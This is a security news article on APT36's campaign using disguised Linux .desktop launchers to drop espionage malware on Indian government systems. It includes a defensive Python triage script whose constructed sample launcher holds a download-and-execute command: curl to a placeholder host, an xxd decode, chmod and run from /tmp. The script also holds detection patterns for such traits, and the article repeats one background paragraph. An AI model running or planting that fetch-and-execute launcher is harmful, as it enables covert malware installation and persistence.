Pakistan-linked APT36 abuses Linux .desktop files to drop custom malware in new campaign

APT36 uses Linux .desktop files in new attacks on Indian gov & defense, aiming for data theft and persistent espionage access.

Transparent Tribe (aka APT36, Operation C-Major, and Mythic Leopard), a Pakistan-linked threat actor, is using Linux .desktop files to load malware in new attacks against government and defense entities in India.

The APT group is targeting Indian government entities via spear-phishing emails deploying custom malware for persistent espionage.

APT36’s latest campaign uses a malicious archive “Meeting_Notice_Ltr_ID1543ops.pdf_.zip” containing a disguised .desktop file flagged on VirusTotal.

The “.desktop” shortcut masquerades as a PDF but hides the commands it runs through Bash in its Exec= line. It downloads a hex-encoded payload from securestore[.]cv, decodes and executes it silently, and opens a benign PDF in Firefox as a decoy. Disguised with a PDF icon, declared as an application, and enabled for autostart, the launcher gains persistence while the malware runs unnoticed.
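The traits just described (document masquerade, a shell wrapper in Exec=, a remote fetch, a hex-decode stage, execution from a writable directory, a decoy viewer, and autostart) can be scored by a small triage script. The one below is an added example, not code from the article or from CYFIRMA; the sample launcher, its placeholder hostname under the reserved .invalid TLD, and the benign comparison entry are all constructed.

```python
import re
from configparser import ConfigParser

# Constructed sample modelled on the launcher the article describes; the host
# is a placeholder under the reserved .invalid TLD, not real infrastructure.
SUSPECT = """[Desktop Entry]
Type=Application
Name=Meeting_Notice_Ltr_ID1543ops.pdf
Icon=application-pdf
Exec=bash -c "curl -s http://c2.example.invalid/p | xxd -r -p > /tmp/.x; chmod +x /tmp/.x; /tmp/.x; firefox /tmp/decoy.pdf"
X-GNOME-Autostart-enabled=true
"""

# Constructed benign launcher for comparison.
BENIGN = """[Desktop Entry]
Type=Application
Name=Text Editor
Icon=accessories-text-editor
Exec=gedit %U
"""

FETCH = r"\b(curl|wget)\b"

# (finding, predicate over the lower-cased entry fields and the file path)
CHECKS = [
    ("document_masquerade", lambda e, p: e["type"].lower() == "application"
     and (e["name"].lower().endswith((".pdf", ".doc", ".docx")) or "pdf" in e["icon"].lower())),
    ("shell_wrapper", lambda e, p: re.match(r"^(ba|da|z)?sh\s+-c\b", e["exec"]) is not None),
    ("remote_fetch", lambda e, p: re.search(FETCH, e["exec"]) is not None),
    ("decode_stage", lambda e, p: re.search(r"\bxxd\s+-r|\bbase64\s+(-d|--decode)", e["exec"]) is not None),
    ("writable_dir_exec", lambda e, p: re.search(r"chmod\s+\+x|/(tmp|dev/shm)/", e["exec"]) is not None),
    ("decoy_viewer", lambda e, p: re.search(r"\b(firefox|xdg-open|evince)\b[^;|]*\.pdf", e["exec"]) is not None
     and re.search(FETCH, e["exec"]) is not None),
    ("autostart", lambda e, p: "/autostart/" in p or e["x-gnome-autostart-enabled"].lower() == "true"),
]

def parse_desktop(text):
    """Return the [Desktop Entry] keys (lower-cased) with empty defaults for the ones inspected."""
    cp = ConfigParser(interpolation=None, strict=False)  # keep '%' and ';' literal in Exec values
    cp.read_string(text)
    fields = dict.fromkeys(("type", "name", "icon", "exec", "x-gnome-autostart-enabled"), "")
    if cp.has_section("Desktop Entry"):
        fields.update(cp.items("Desktop Entry"))  # option names are already lower-cased
    return fields

def triage_desktop(text, path=""):
    """List the suspicious traits found; several together are a strong signal."""
    entry = parse_desktop(text)
    return [name for name, check in CHECKS if check(entry, path)]
```

Run it over launchers found in user autostart directories and in recently extracted archives; a hit on three or more findings is worth pulling the file for analysis.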

The campaign was uncovered on August 1, 2025, and is still ongoing.

The analyzed file is a suspicious 64-bit ELF executable for x86-64, statically linked, with anomalies like a huge section header offset, missing section names, and irregular segments typical of malware packing. It embeds the hardcoded C2 “modgovindia[.]space:4000” and ensures persistence via cron jobs and systemd service abuse. On execution, it connects to the C2, using DNS queries and UDP sockets for stealthy communication, enabling data exfiltration and attacker control.

Operation Transparent Tribe (also tracked as Operation C-Major, APT36, and Mythic Leopard) was first spotted by Proofpoint researchers in February 2016, in a series of cyber espionage operations against Indian diplomats and military personnel at embassies in Saudi Arabia and Kazakhstan. At the time, the researchers traced the source IPs to Pakistan; the attacks were part of a wider operation that relied on multiple vectors, such as watering hole websites and phishing email campaigns, to deliver custom RATs dubbed Crimson and Peppy. These RATs are capable of exfiltrating information, taking screenshots, and recording webcam streams.

Transparent Tribe has been active since at least 2013 and has targeted entities across 27 countries, most of them in Afghanistan, Germany, India, Iran, and Pakistan.

Transparent Tribe (APT36) was first spotted in 2016 targeting Indian diplomats and military staff via phishing and watering hole attacks. Linked to Pakistan, it used custom RATs like Crimson and Peppy to exfiltrate data, capture screenshots, and record webcams. The group has targeted entities in 27 countries, mainly India, Afghanistan, Germany, Iran, and Pakistan.

“While Indian government entities remain the primary focus, APT36 has extended operations to adjacent sectors (education, research, and civil society), as well as opportunistic targeting in other geographies. This broad victimology increases the attack surface and introduces risk to partners, suppliers, and diplomatic missions abroad,” concludes the report published by CYFIRMA. “The adoption of .desktop payloads targeting Linux BOSS reflects a tactical shift toward exploiting indigenous technologies. Combined with traditional Windows-based malware and mobile implants, this shows the group’s intent to diversify access vectors and ensure persistence even in hardened environments.”


Pierluigi Paganini

(SecurityAffairs – hacking, APT36)